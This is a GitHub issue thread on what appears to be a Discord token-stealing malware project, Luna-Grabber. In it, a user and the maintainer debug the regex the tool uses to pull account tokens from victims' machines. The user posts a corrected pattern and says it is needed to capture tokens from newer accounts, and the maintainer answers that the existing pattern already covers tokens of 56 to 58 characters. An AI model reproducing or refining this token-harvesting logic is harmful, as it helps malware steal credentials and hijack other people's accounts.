### ISSUE TITLE
regex has a typo

### ISSUE THREAD

**Issue by BobbityBoo** [Smug246/Luna-Grabber#212]
the self.regex (not the encrypted one) in luna.py  has a typo, i don't know where is the typo but the regex skips the first two letter of the token

**Comment by BobbityBoo** [comment]
ok i found the issue 
                                           ↓
fixed "self.regex = `r"[\w-]{26}\.[\w-]{6}\.[\w-]{25,110}"`  that should be 26 instead of 24

**Comment by Smug246** [comment]
ima just leave it as that for when they change it back. it doesnt make a difference really

**Comment by BobbityBoo** [comment]
> ima just leave it as that for when they change it back. it doesnt make a difference really

but it won't work with new accounts only old ones

**Comment by Smug246** [comment]
thats not how it works. it gets tokens from length of 56 to 58 it includes them. if you think im wrong you can test it
